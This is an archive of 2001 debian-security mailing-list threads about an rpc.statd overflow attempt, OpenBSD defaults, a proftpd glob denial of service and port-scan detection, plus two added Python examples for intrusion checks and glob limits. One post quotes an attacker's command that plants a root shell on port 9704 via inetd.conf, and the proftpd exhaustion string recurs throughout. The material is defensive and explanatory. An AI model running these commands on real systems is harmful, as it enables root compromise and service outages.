in 2.5 ftpd, portmap, smtp, and identd were open, i am pretty sure rstatd was not. 2.6 i think disabled ftpd by default, shortly thereafter a root hole was found in openbsd's ftpd and they promptly said `ftpd is not enabled in the default install of 2.6 (or whatever) and thus there is no root hole in our default install'

-- 
Ethan Benson
http://www.alaska.net/~erbenson/
Re: strange log entry
On Thu, May 24, 2001 at 04:06:08AM -0800, Ethan Benson wrote:
> On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote:
> > BS, when was the last time you installed OpenBSD? I just did an install
>
> 2.5

That was what, 2 years ago?

> > today. I guarantee portmap, ruserd, and rstatd are enabled by default, as the installer doesn't even ask what you want to activate, and these programs are part of the base tarball.
>
> in 2.5 ftpd, portmap, smtp, and identd were open, i am pretty sure rstatd was not. 2.6 i think disabled ftpd by default, shortly thereafter a root hole was found in openbsd's ftpd and they promptly said `ftpd is not enabled in the default install of 2.6 (or whatever) and thus there is no root hole in our default install'

Ah, they probably caught the problem shortly before 2.6 release, and didn't have time to fix ftp code, but changing rc.conf was doable.

Anyway, as of 2.9, portmap, rstatd, ruserd, time, daytime, comsat, sshd and identd are enabled by default.

Like I said, I didn't want to start a discussion about OpenBSD vs Linux, I have seen posts from you saying that you like some features of OpenBSD, /sbin/nologin for example. I'm just curious why the 'r' tools are apparently so vulnerable in Linux.

If the OpenBSD folks are willing to risk credibility by claiming that their default install has no remote holes, while enabling portmap and rstatd by default, why can't Linux users feel safe running those daemons also?

[EMAIL PROTECTED]
Re: strange log entry
On Thu, May 24, 2001 at 05:41:08AM -0700, Jacob Meuser wrote:
> On Thu, May 24, 2001 at 04:06:08AM -0800, Ethan Benson wrote:
> > On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote:
> > > BS, when was the last time you installed OpenBSD? I just did an install
> >
> > 2.5
>
> That was what, 2 years ago?

1.5 years or so yes, i haven't messed with openbsd in a while, i was going to use it for my firewall but there were some problems with it so i ditched in favor of debian. OpenBSD's security reputation is a bit exaggerated, with some good admining a linux box can be just as secure... i was also quite annoyed by its complete lack of upgradability, i tried twice in testing to upgrade the dist from one version to another, it failed and made a mess every time, screw that. i don't think much of rebuilding a box every 6mo - 1 year just to keep up with the times.

> Ah, they probably caught the problem shortly before 2.6 release, and didn't have time to fix ftp code, but changing rc.conf was doable.

heh you're almost as cynical as i am ;-)

> Anyway, as of 2.9, portmap, rstatd, ruserd, time, daytime, comsat, sshd and identd are enabled by default.

hmm maybe my memory is funky but that seems like more than i saw out of the box... it still had more crap running than i prefer.

> Like I said, I didn't want to start a discussion about OpenBSD vs Linux, I have seen posts from you saying that you like some features of OpenBSD, /sbin/nologin for example.

it's a nice system, i like the simplicity and clean design, it's like debian in that. but upgrading the whole thing is simply impossible. well maybe grabbing all source from CVS and doing make world will do it, but i didn't try it. the `official' upgrade system is broken.

> I'm just curious why the 'r' tools are apparently so vulnerable in Linux.
>
> If the OpenBSD folks are willing to risk credibility by claiming that their default install has no remote holes, while enabling portmap and rstatd by default, why can't Linux users feel safe running those daemons also?

well openbsd claims to have audited everything they enable by default, and everything in their base install (which is VERY lean). from reading bugtraq they seem to have a very bad habit about fixing bugs quietly and not bothering to send patches upstream, instead posting sarcastic messages along the lines of `oh yeah we fixed that in CVS 3 years ago' (check out the recent joe DEADJOE vulnerability for an example). of course i could be wrong, and all upstream developers are just blackholing openbsd security patches.

-- 
Ethan Benson
http://www.alaska.net/~erbenson/
Re: strange log entry
On Thu, 24 May 2001 [EMAIL PROTECTED] wrote:

What you have there is someone trying to do a buffer overflow attack on rpc.statd. The idea is that once the buffer is blown, they will get a chance to issue a command as root. In the attack that was attempted on one of the systems I was given to supervise, the last part of the garbage sent to the buffer was:

/bin/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i /etc/inetd.conf;killall -HUP inetd

This, if it had succeeded, would have created a new line in inetd.conf and restarted inetd. Then they would have come in on port 9704 to a nice root shell and done whatever they wanted to do: probably remove that line, edit my logs, install a root kit, and leave as quietly as possible. Luckily this time it didn't work and left some dirty footprints as evidence.

As stated earlier the best way to deal with this, if you don't need rpc services running for NFS/NIS or something similar, is to just shut portmapper and all the other RPC services down and remove them from your start up scripts. I was curious however, so I just made sure tcp wrapper (tcpd) covered portmapper and added

portmap: ALL

to my /etc/hosts.deny file so I could gather some IP numbers via TCPD logging. Figure I should let the networks assigned the IPs know that some of their machines are compromised/being used for cracking.

While setting up a firewall as others have previously suggested is a dang good idea, don't forget to use tcp wrappers also, if for only the logging. For the security conscious, or the inexperienced, a good first step right after first booting a machine is to type

su -c echo ALL:ALL /etc/hosts.deny root

I'd do that before even connecting to the network. Later if you must you can relax it a bit, but it's a good place to start.

However, now that you have seen this one attack, you should probably go over your logs and system accounting files with a fine tooth comb and see if anyone else might have succeeded before or after ;) This is a far from exhaustive list but try:

- looking for any breaks in your log files or unexpected daemon restarts.
- examine your crontabs to see if there are any jobs you didn't put there.
- check your /etc/passwd file for any unrecognized users or strange shells.
- check inetd.conf for any odd entries.
- run a find / -m x to look for new or edited files. See if there are any there that you don't remember editing. Look for changed permissions too.
- download a root kit detector and see if anyone has already left you a present.

Again, this is just the start ;)

I apologize to folks who consider this all old-news, but trevs was brave enough to admit he didn't know, so there are probably a few others lurking in the same boat ;)

Good luck!
David.

> Heya :) I was running a 'tail -f' on my /var/log/messages and this entry appeared while I was connected to the internet:
>
> May 24 10:08:11 noogies -- MARK --
> May 24 10:20:34 noogies
> May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for [exploit payload omitted]
>
> and it has me worried it may be a security issue.
> I'm very new to linux, and newer again to debian, and at this stage I really don't have a clue as to what the above log entry is trying to tell me... Any input or comments would be very appreciated :)
> Thank you - trevs
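David's checklist as a small script, covering the inetd.conf, /etc/passwd and crontab items; this is an added example for this thread, not David's own script and not a Debian tool. It works on file text so it can run against copies taken off the suspect box; the sample files are constructed, with the planted inetd line taken from David's message, and the "hideout" path list is my own assumption.

```python
"""Post-incident checks for the inetd.conf, /etc/passwd and crontab items
in the list above. Added example for this thread, not David's script and
not a Debian tool. Each check takes the text of a file (copy the files off
the suspect box first, or read them from a mounted image) and returns the
lines worth a second look. The samples are constructed; the planted inetd
line is the one quoted in the message."""
import os
import sys

INETD_SAMPLE = """\
# /etc/inetd.conf (constructed sample)
ftp     stream  tcp  nowait  root  /usr/sbin/tcpd  /usr/sbin/in.ftpd
telnet  stream  tcp  nowait  root  /usr/sbin/tcpd  /usr/sbin/in.telnetd
9704 stream tcp nowait root /bin/sh sh -i
"""

PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
trevs:x:1000:1000:trevs:/home/trevs:/bin/bash
toor:x:0:0::/dev/.hid:/bin/bash
ftpd:x:1001:1001::/tmp/...:/bin/sh
"""

CRONTAB_SAMPLE = """\
# m h dom mon dow user command (constructed sample of /etc/crontab)
17 *    * * *   root  run-parts --report /etc/cron.hourly
*/5 *   * * *   root  /dev/.hid/beacon.sh
0 3     * * *   root  /usr/sbin/logrotate /etc/logrotate.conf
"""

SHELLS = ("/bin/sh", "/bin/bash", "/bin/csh", "/bin/tcsh", "/bin/ksh", "/bin/zsh")


def looks_hidden(path):
    """True for the usual parking spots for dropped files (assumed list):
    /tmp, /var/tmp, dot-directories under /dev, and '...' directory names."""
    return path.startswith(("/tmp/", "/var/tmp/", "/dev/.")) or "/..." in path


def odd_inetd_entries(text):
    """inetd.conf lines that hand a shell to the network, bind a raw port
    number instead of a service name, or run root's server from a hideout."""
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        f = line.split()                 # service socket proto wait user program args...
        if len(f) < 6:
            continue
        service, user, program = f[0], f[4].split(".")[0], f[5]
        if program in SHELLS or service.isdigit() or (user == "root" and looks_hidden(program)):
            hits.append(line)
    return hits


def odd_passwd_entries(text, expected_uid0=("root",)):
    """Extra UID-0 accounts, malformed lines, and homes or shells in hideouts."""
    hits = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7:                  # a line that does not parse deserves a look itself
            hits.append(line)
            continue
        name, uid, home, shell = f[0], f[2], f[5], f[6]
        if (uid == "0" and name not in expected_uid0) or looks_hidden(home) or looks_hidden(shell):
            hits.append(line)
    return hits


def odd_crontab_entries(text):
    """System crontab jobs that run something from a hideout or touch inetd.conf."""
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                     # comment or VAR=value line
        f = line.split(None, 6)          # m h dom mon dow user command
        if len(f) < 7:
            continue
        command = f[6]
        if "inetd.conf" in command or any(looks_hidden(tok) for tok in command.split()):
            hits.append(line)
    return hits


if __name__ == "__main__":
    # No argument: check the constructed samples. Argument: a directory holding
    # copies of inetd.conf, passwd and crontab taken from the suspect machine.
    if len(sys.argv) > 1:
        files = [open(os.path.join(sys.argv[1], n)).read() for n in ("inetd.conf", "passwd", "crontab")]
    else:
        files = [INETD_SAMPLE, PASSWD_SAMPLE, CRONTAB_SAMPLE]
    checks = (odd_inetd_entries, odd_passwd_entries, odd_crontab_entries)
    for label, check, text in zip(("inetd.conf", "passwd", "crontab"), checks, files):
        for hit in check(text):
            print(f"{label}: {hit}")
```

The find and root-kit-detector items on David's list are left to the tools he names; a hit here is a starting point for a look, not proof of compromise on its own.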
Re: wdm security
On Thu, May 24, 2001 at 01:53:46PM +0300, Juha Jäykkä wrote:
> I am a little concerned about XFree86+wdm keeping a bunch of processes listening on port 32768. (wdm is the windowmaker xdm

Hi. I am the wdm maintainer for Debian. I haven't been maintaining this package for too long, and I'm not sure why it listens on port 32768. I am going to look into it, because it doesn't seem necessary to me. If I find that it is something that can safely be turned off (or if it's a bug) I will fix it for the next upload.

Interestingly enough, a quick find/grep traversal of the wdm source indicates that the only code for setting up network listeners comes directly from the xdm sources without modification at all. That implies to me that the listener on port 32768 should be as safe as the standard xdm listener on port 6000. But I still don't see why it's there.

> this. Should I trash wdm or what? It's a little sad thing to do since it allows me to choose a window manager at login time, something xdm does not do (at least didn't last time I checked).

I would not trash wdm just yet. Let me take a look. If you're concerned, you might want to firewall that port using ipchains or iptables.

noah

-- 
Web: http://web.morgul.net/~frodo/
PGP Public Key: http://web.morgul.net/~frodo/mail.html
Re: strange log entry
On Thu, May 24, 2001 at 01:34:01AM -0700, Jacob Meuser wrote:
> OpenBSD ships with rstatd and ruserd enabled by default and according to http://www.openbsd.org/ "Four years without a remote hole in the default install!"
>
> Which begs the question, especially since the *BSD's release their sources under BSD style licenses, why does rpc remain a security problem in Linux? Is it the kernel? Is it the rpc code?

This is not the same stuff at all. They ship with rstatd turned on, not rpc.statd. They are completely different. rpc.statd is used by nfs. rstatd is used by the rstat program, which tells you info about machines on your network. It is like running 'uptime' on all your machines at once.

noah

-- 
Web: http://web.morgul.net/~frodo/
PGP Public Key: http://web.morgul.net/~frodo/mail.html
Problem with logging firewall packets
Hi guys/gals,

Okay, I'm *really* embarrassed about this, but I can't get syslog to log firewall packets to a logfile - it insists on sending them to my Debian box's console. I've checked the /etc/syslog.conf file and there's no mention of a console there at all, so what am I doing wrong?

The crappy ipchains test script I've rigged is working, a grc.com scan is being blocked in all the right ways, but I just can't get the logs on magnetic media... what really simple, obvious, even-a-redheaded-stepchild-could-work-it-out step am I missing?

Thanks...

Paul D
-crap-
RE: strange log entry
Hello,

the same can be said with nfs and coda/samba (windows filesharing); they are both easily exploitable codes simply by the way they operate. Basically, in a nutshell, the code assumes too much, which makes it easily exploitable.

Ed

-----Original Message-----
From: Jacob Meuser [mailto:[EMAIL PROTECTED]
Sent: Thursday, May 24, 2001 4:34 AM
To: debian-security@lists.debian.org
Subject: Re: strange log entry

On Thu, May 24, 2001 at 01:24:50AM -0400, Ed Street wrote:
> Hello, Well first off WHY are you running the rpc stuff? (i.e. I can root a redhat 6.x box in under 30 seconds with a rpc exploit from a clean install) Turn that stuff OFF.

Not to start a thread discussing OSes, but ...

OpenBSD ships with rstatd and ruserd enabled by default and according to http://www.openbsd.org/ "Four years without a remote hole in the default install!"

Which begs the question, especially since the *BSD's release their sources under BSD style licenses, why does rpc remain a security problem in Linux? Is it the kernel? Is it the rpc code?

Simply curious,
[EMAIL PROTECTED]
RE: strange log entry
Hello,

that's simple ;) If they were stable/non-exploitable then we'd be using rpc in place of ssh ;)

Ed

-----Original Message-----
From: Jacob Meuser [mailto:[EMAIL PROTECTED]
Sent: Thursday, May 24, 2001 8:41 AM
To: debian-security@lists.debian.org
Subject: Re: strange log entry

On Thu, May 24, 2001 at 04:06:08AM -0800, Ethan Benson wrote:
> On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote:
> > BS, when was the last time you installed OpenBSD? I just did an install
>
> 2.5

That was what, 2 years ago?

> > today. I guarantee portmap, ruserd, and rstatd are enabled by default, as the installer doesn't even ask what you want to activate, and these programs are part of the base tarball.
>
> in 2.5 ftpd, portmap, smtp, and identd were open, i am pretty sure rstatd was not. 2.6 i think disabled ftpd by default, shortly thereafter a root hole was found in openbsd's ftpd and they promptly said `ftpd is not enabled in the default install of 2.6 (or whatever) and thus there is no root hole in our default install'

Ah, they probably caught the problem shortly before 2.6 release, and didn't have time to fix ftp code, but changing rc.conf was doable.

Anyway, as of 2.9, portmap, rstatd, ruserd, time, daytime, comsat, sshd and identd are enabled by default.

Like I said, I didn't want to start a discussion about OpenBSD vs Linux, I have seen posts from you saying that you like some features of OpenBSD, /sbin/nologin for example. I'm just curious why the 'r' tools are apparently so vulnerable in Linux.

If the OpenBSD folks are willing to risk credibility by claiming that their default install has no remote holes, while enabling portmap and rstatd by default, why can't Linux users feel safe running those daemons also?

[EMAIL PROTECTED]
RE: wdm security
Hello,

If memory serves me correctly there's a line in /etc/X11 that you can add/modify to tell it to NOT listen.

Ed

-----Original Message-----
From: Noah L. Meyerhans [mailto:[EMAIL PROTECTED]
Sent: Thursday, May 24, 2001 10:47 AM
To: Debian Security List
Subject: Re: wdm security

On Thu, May 24, 2001 at 01:53:46PM +0300, Juha Jäykkä wrote:
> I am a little concerned about XFree86+wdm keeping a bunch of processes listening on port 32768. (wdm is the windowmaker xdm

Hi. I am the wdm maintainer for Debian. I haven't been maintaining this package for too long, and I'm not sure why it listens on port 32768. I am going to look into it, because it doesn't seem necessary to me. If I find that it is something that can safely be turned off (or if it's a bug) I will fix it for the next upload.

Interestingly enough, a quick find/grep traversal of the wdm source indicates that the only code for setting up network listeners comes directly from the xdm sources without modification at all. That implies to me that the listener on port 32768 should be as safe as the standard xdm listener on port 6000. But I still don't see why it's there.

> this. Should I trash wdm or what? It's a little sad thing to do since it allows me to choose a window manager at login time, something xdm does not do (at least didn't last time I checked).

I would not trash wdm just yet. Let me take a look. If you're concerned, you might want to firewall that port using ipchains or iptables.

noah

-- 
Web: http://web.morgul.net/~frodo/
PGP Public Key: http://web.morgul.net/~frodo/mail.html
RE: Problem with logging firewall packets
Hello,

Make sure you have klogd and syslogd running.

Ed

-----Original Message-----
From: Paul Dossett [mailto:[EMAIL PROTECTED]
Sent: Thursday, May 24, 2001 12:00 PM
To: debian-security@lists.debian.org
Subject: Problem with logging firewall packets

Hi guys/gals,

Okay, I'm *really* embarrassed about this, but I can't get syslog to log firewall packets to a logfile - it insists on sending them to my Debian box's console. I've checked the /etc/syslog.conf file and there's no mention of a console there at all, so what am I doing wrong?

The crappy ipchains test script I've rigged is working, a grc.com scan is being blocked in all the right ways, but I just can't get the logs on magnetic media... what really simple, obvious, even-a-redheaded-stepchild-could-work-it-out step am I missing?

Thanks...

Paul D
-crap-
msg from list when posting.
Hello,

anyone know why I get this when I post anything to this list?

Fatal Error: \n \nQuota for user [EMAIL PROTECTED] exceeded! \n \nOriginal message follows: \n \n

it's from their mail delivery subsystem.

Ed

-----Original Message-----
From: Ed Street [mailto:[EMAIL PROTECTED]
Sent: Thursday, May 24, 2001 12:10 PM
To: debian-security@lists.debian.org
Subject: RE: strange log entry

Hello,

that's simple ;) If they were stable/non-exploitable then we'd be using rpc in place of ssh ;)

Ed
Re: Problem with logging firewall packets
I'm running Progeny, and had to go to Debian's testing distro to get klogd, but that doesn't seem to do anything... still investigating. Both syslogd and klogd are running, according to top.. :)

Any more ideas? I'm really stumped. This worked fine under Red Hat.

ppp

----- Original Message -----
From: Ed Street [EMAIL PROTECTED]
To: Paul Dossett [EMAIL PROTECTED]; debian-security@lists.debian.org
Sent: Friday, May 25, 2001 2:17 AM
Subject: RE: Problem with logging firewall packets

> Hello,
>
> Make sure you have klogd and syslogd running.
>
> Ed
RE: Problem with logging firewall packets
Hello,

OK what's being logged to console? Under iptables it WILL log warnings + to console unless you modify /etc/init.d/klogd. This is a clip from my rc.firewall.iptables btw

#
# LOG level option. NOTE klogd reflects these values for console broadcast
# Simply start klogd with -c 4 to ONLY display errors and above on the console.
LOG_LEVEL=notice
#define KERN_EMERG   0 /* system is unusable */
#define KERN_ALERT   1 /* action must be taken immediately */
#define KERN_CRIT    2 /* critical conditions */
#define KERN_ERR     3 /* error conditions */
#define KERN_WARNING 4 /* warning conditions */
#define KERN_NOTICE  5 /* normal but significant condition */
#define KERN_INFO    6 /* informational */
#define KERN_DEBUG   7 /* debug-level messages */
#

Ed

-----Original Message-----
From: Paul Dossett [mailto:[EMAIL PROTECTED]
Sent: Thursday, May 24, 2001 12:24 PM
To: Ed Street; debian-security@lists.debian.org
Subject: Re: Problem with logging firewall packets

I'm running Progeny, and had to go to Debian's testing distro to get klogd, but that doesn't seem to do anything... still investigating. Both syslogd and klogd are running, according to top.. :)

Any more ideas? I'm really stumped. This worked fine under Red Hat.

ppp
Re: Problem with logging firewall packets
----- Original Message -----
From: Ronny Adsetts [EMAIL PROTECTED]
To: Paul Dossett [EMAIL PROTECTED]
Sent: Friday, May 25, 2001 2:27 AM
Subject: RE: Problem with logging firewall packets

> > Okay, I'm *really* embarrassed about this, but I can't get syslog to log firewall packets to a logfile - it insists on sending them to my Debian box's console. I've checked the /etc/syslog.conf file and there's no mention of a console there at all, so what am I doing wrong?
> >
> > The crappy ipchains test script I've rigged is working, a grc.com scan is being blocked in all the right ways, but I just can't get the logs on magnetic media... what really simple, obvious, even-a-redheaded-stepchild-could-work-it-out step am I missing?
>
> Probably klogd is missing. try:
>
> # apt-get update
> apt-get install klogd

It was installed, but the kicker was that something seemed to be wrong with the init script: the syslogd and klogd daemons weren't restarting when I executed their scripts, so the changes I made in the syslog.conf file were being ignored. Manually killing the processes and restarting them worked, and logging is back... thanks all!

Hopefully I can return the favour for some *other* foolish newbie... ;)

ppp
Re: Problem with logging firewall packets
Haven't seen this before but a workaround could be to just have syslog-ng read from /proc/kmsg; it does the same thing as a klogd would do.

On Fri, 25 May 2001, Paul Dossett wrote:

> I'm running Progeny, and had to go to Debian's testing distro to get klogd, but that doesn't seem to do anything... still investigating. Both syslogd and klogd are running, according to top.. :)
>
> Any more ideas? I'm really stumped. This worked fine under Red Hat.
>
> ppp
>
> ----- Original Message -----
> From: Ed Street [EMAIL PROTECTED]
> To: Paul Dossett [EMAIL PROTECTED]; debian-security@lists.debian.org
> Sent: Friday, May 25, 2001 2:17 AM
> Subject: RE: Problem with logging firewall packets
>
> > Hello,
> >
> > Make sure you have klogd and syslogd running.
> >
> > Ed
> >
> > -----Original Message-----
> > From: Paul Dossett [mailto:[EMAIL PROTECTED]]
> > Sent: Thursday, May 24, 2001 12:00 PM
> > To: debian-security@lists.debian.org
> > Subject: Problem with logging firewall packets
> >
> > > Hi guys/gals,
> > >
> > > Okay, I'm *really* embarrassed about this, but I can't get syslog to log firewall packets to a logfile - it insists on sending them to my Debian box's console. I've checked the /etc/syslog.conf file and there's no mention of a console there at all, so what am I doing wrong?
> > >
> > > The crappy ipchains test script I've rigged is working, a grc.com scan is being blocked in all the right ways, but I just can't get the logs on magnetic media... what really simple, obvious, even-a-redheaded-stepchild-could-work-it-out step am I missing?
> > >
> > > Thanks...
> > >
> > > Paul D
> > > -crap-
proftpd exploit??
Hi!!

I have Potato in a machine, with

ii  proftpd  1.2.0pre10-2.0  Versatile, virtual-hosting FTP daemon

It's the last version in security.debian.org

I've tried to exploit it by login and sending:

ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../

and suddenly it began eating memory and getting slow all the system. When I killed proftpd, system was almost KO.

Any solution??

Thanks in advance :-)

--
101 Things you do NOT want your System Administrator to say.
93. We don't support that. We won't support that.
--
Cagarruta [EMAIL PROTECTED]
Linux Reg. User #66054
--
Re: proftpd exploit??
On Thu, 24 May 2001, Andres Herrera wrote:

> I've tried to exploit it by login and sending:
>
> ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../
>
> and suddenly it began eating memory and getting slow all the system.
> ...
> Any solution??

Resource limits on the ftp server process?

Zak.
Re: proftpd exploit??
Andres Herrera wrote on Thu May 24, 2001 at 07:43:50PM:

[proftpd exploit ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../]

> Any solution??

There was mentioned a suggested entry (meant as an intermediate solution until proftpd has been fixed) to /etc/proftpd.conf:

DenyFilter \*.*/

hth,
Matthias

--
Matthias Richter --+- stud. soz. inf. -+-- http://www.uni-leipzig.de
--GPG Public Key: http://www.matthias-richter.de/gpg.ascii--
«Reality must take precedence over public relations, for Mother Nature cannot be fooled.» -- R.P. Feynman
Re: proftpd exploit??
On Thu, May 24, 2001 at 07:43:50PM +0200, Andres Herrera wrote:

> Hi!!
>
> I have Potato in a machine, with
>
> ii  proftpd  1.2.0pre10-2.0  Versatile, virtual-hosting FTP daemon
>
> It's the last version in security.debian.org
>
> I've tried to exploit it by login and sending:
>
> ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../
>
> and suddenly it began eating memory and getting slow all the system. When I killed proftpd, system was almost KO.

This is an old and known bug. It's fixed in the CVS tree and the current unstable version. Have a look at the bug tracking system at www.proftpd.org

> Any solution??

There are a few PathDeny filters out to check this and other versions of this bug. The other solution is to upgrade to the very stable unstable version ;-)

Sven

--
Subject: Re: woody hanging
WRT subject. $ apt-get install viagra ;-)
[Karsten M. Self in debian-user]
Re: proftpd exploit??
There was a discussion on this on the proftpd mailing list. Go to www.proftpd.org and check the archives. If I can dredge the answer up from old saved email I'll post here. You might also want to join that mailing list for help on this and future issues.

At 07:15 PM 5/24/2001 +0100, Zak Kipling wrote:

> On Thu, 24 May 2001, Andres Herrera wrote:
>
> > I've tried to exploit it by login and sending:
> >
> > ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../
> >
> > and suddenly it began eating memory and getting slow all the system.
> > ...
> > Any solution??
>
> Resource limits on the ftp server process?
>
> Zak.

--
Eric N. Valor
Webmeister/Inetservices
Lutris Technologies
[EMAIL PROTECTED]
- This Space Intentionally Left Blank -
Re: proftpd exploit??
Zak Kipling wrote:

> On Thu, 24 May 2001, Andres Herrera wrote:
>
> > I've tried to exploit it by login and sending:
> >
> > ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../
> >
> > and suddenly it began eating memory and getting slow all the system.
> > ...
> > Any solution??
>
> Resource limits on the ftp server process?

Or a DenyFilter of \*.*/ as is recommended on the proftpd.org web site.

http://www.proftpd.org/critbugs.html

--
Jamie Heilman http://audible.transient.net/~jamie/
"...thats the metaphorical equivalent of flopping your wedding tackle into a lion's mouth and flicking his lovespuds with a wet towel, pure insanity..." -Rimmer
Re: proftpd exploit??
Zak Kipling wrote:

> On Thu, 24 May 2001, Andres Herrera wrote:
>
> > I've tried to exploit it by login and sending:
> >
> > ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../
> >
> > and suddenly it began eating memory and getting slow all the system.
> > ...
> > Any solution??
>
> Resource limits on the ftp server process?

what about PathDenyFilter?

robt
Re: strange log entry
On Thu, May 24, 2001 at 07:33:44AM +, Jim Breton wrote:

> On Thu, May 24, 2001 at 04:10:13PM +0900, Curt Howland wrote:
>
> > the last two i understand, as well as domain, but sunrpc and 1171?
>
> man fuser. Look for the -n option.

... or look for -p option of netstat :)

Mirek
Re: proftpd exploit??
Hi!!

Thanks to everybody (and sorry for my english 0:) )

I've chosen the DenyFilter option and everything goes OK again :- The user just gets a "Forbidden command argument" message.

... and certainly I'm subscribing my account to the proftpd mailing list ;-)

Thanks again

--
101 Things you do NOT want your System Administrator to say.
94. ...and after I patched the microcode...
--
Cagarruta [EMAIL PROTECTED]
Linux Reg. User #66054
--
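Two things the thread leaves implicit are why that ls pattern eats memory (every `*` multiplies the set of candidate directories and every `..` folds them back to the parent without de-duplicating, so work grows as subdirectories to the power of wildcards) and what the DenyFilter `\*.*/` workaround actually screens. The following stand-alone Python is an added model of both; it is not proftpd's code and was not posted in this thread. The in-memory directory tree, the visit budget, and the function names are this example's own assumptions.

```python
"""Bounded glob expansion and a DenyFilter check for the proftpd ls DoS.

Added example, not proftpd's code.  It keeps every candidate path, duplicates
included, just as the vulnerable glob did, so the blow-up is reproduced in
miniature; unlike that glob it counts directory visits and stops at a budget.
The tree, the budget and the names are this example's own.
"""
import fnmatch
import re

# DenyFilter in /etc/proftpd.conf is a regex applied to the argument of each
# FTP command; a match makes proftpd answer "Forbidden command argument".
# \*.*/ reads: a literal '*', then anything, then a '/'.
DENY_FILTER = re.compile(r"\*.*/")
FORBIDDEN = "Forbidden command argument"


def screen_command(line, deny=DENY_FILTER):
    """Apply the filter the way proftpd does: to the argument, not the verb.
    Returns None when the command may proceed, else the refusal text."""
    verb, _, arg = line.strip().partition(" ")
    if arg and deny.search(arg):
        return FORBIDDEN
    return None


class GlobBudgetExceeded(Exception):
    """Raised when an expansion visits more directories than allowed."""


def _node_at(root, path):
    node = root
    for name in path:
        node = node[name]
    return node


def expand(root, pattern, budget=10_000):
    """Expand a shell-style pattern against an in-memory tree.

    `root` is nested dicts; a value of None is a file.  Returns
    (matches, visits); raises GlobBudgetExceeded once more than `budget`
    directories have been examined, which is the cap the server lacked.
    """
    frontier = [()]          # candidate paths as tuples of names under root
    visits = 0
    for comp in [c for c in pattern.split("/") if c and c != "."]:
        nxt = []
        for path in frontier:
            node = _node_at(root, path)
            if node is None:   # files have no children
                continue
            visits += 1
            if visits > budget:
                raise GlobBudgetExceeded(f"{visits} directory visits")
            if comp == "..":
                nxt.append(path[:-1])   # root's parent is root, as inside a chroot
            else:
                nxt.extend(path + (name,) for name in node
                           if fnmatch.fnmatchcase(name, comp))
        frontier = nxt
    return ["/" + "/".join(p) for p in frontier], visits


# Constructed anonymous-FTP tree: three subdirectories and one file.
TREE = {"pub": {"readme.txt": None}, "incoming": {}, "mirror": {}}
# The argument from Andres' report (ten wildcards).
ATTACK = "../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../"

if __name__ == "__main__":
    print(screen_command("LIST " + ATTACK))           # refused by the filter
    print(expand(TREE, "../*/../*/../*/../")[1])       # 53 visits for 3 wildcards
    try:
        expand(TREE, ATTACK)
    except GlobBudgetExceeded as e:
        print("stopped:", e)
```

Note the side effect Andres' users will see: because the regex only asks for a `*` followed somewhere by a `/`, a perfectly harmless `LIST pub/*/` is refused too. That is the price of an interim filter and is why the thread also points at the fixed version.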
detecting portscanning
Hello Everyone,

It is my first time I'm putting up a server (at home, cable modem) with ftp/ssh/apache on it. Now I would like to know who does portscans on my machine, and when. And how many.

Is there a package for it in debian? Or do I have to install something else.

Thanks in advance,

Rudy
--
e: [EMAIL PROTECTED]                       phone: 0486/690159
url: http://studwww.rug.ac.be/~rgevaert/   http://zeus.rug.ac.be
Re: detecting portscanning
On Thu, 24 May 2001, Rudy Gevaert wrote:

Hello again,

Some people suggested ippl, I installed it, and it runs. It works :-)

Some other people said I should use portsentry. And I looked for it on the website, and it is a tar.gz file, but in the unstable section I can find a deb file. But I'm using stable. Will this give any problems? Or can I just download it? I think I will have to add a line to my apt-get config file. Right?

Again, thanks in advance,

Rudy
--
e: [EMAIL PROTECTED]                       phone: 0486/690159
url: http://studwww.rug.ac.be/~rgevaert/   http://zeus.rug.ac.be
Re: detecting portscanning
On Thursday 24 May 2001 14:01, Rudy Gevaert wrote:

> On Thu, 24 May 2001, Rudy Gevaert wrote:
>
> Hello again,
>
> Some people suggested ippl, I installed it, and it runs. It works :-)
>
> Some other people said I should use portsentry. And I looked for it on the website, and it is a tar.gz file, but in the unstable section I can find a deb file. But I'm using stable. Will this give any problems? Or can I just download it? I think I will have to add a line to my apt-get config file. Right?
>
> Again, thanks in advance,
>
> Rudy

The problem with portsentry is that it binds to all the ports you are watching, so people that are scanning actually see those ports open. It is better to use snort, which will let you know that the scans have happened without the attacker being aware.
Re: detecting portscanning
> The problem with portsentry is that it binds to all the ports you are watching, so people that are scanning actually see those ports open. It is better to use snort, which will let you know that the scans have happened without the attacker being aware.

Although it binds to all the ports portsentry can blackhole the scanner as soon as it detects it with an IP chains rule. Once the user starts a scan they will be immediately blackholed and will never even complete the scan.

:wq
Tim Uckun
Due Diligence Inc. http://www.diligence.com/
Americas Background Investigation Expert.
If your company isn't doing background checks, maybe you haven't considered the risks of a bad hire.
RE: detecting portscanning
Hello,

there's several methods to tell that.

a) use a product like portsentry
b) use iptables/ipchains to reject all forms of portscans
c) don't connect the box to the inet as portscans are a fact of life ;)

portsentry will trashcan any system that attempts to portscan you. If you're using 2.2.x you may want to put on the stealth kernel patch (freshmeat.net search for stealth) that helps hinder scans.

iptables has an awesome mechanism for portscans ;) in fact you can set it up so that all portscans (well most I should say) will literally take HOURS to return nothing.

Ed

-----Original Message-----
From: Rudy Gevaert [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 24, 2001 4:17 PM
To: debian-security@lists.debian.org
Subject: detecting portscanning

> Hello Everyone,
>
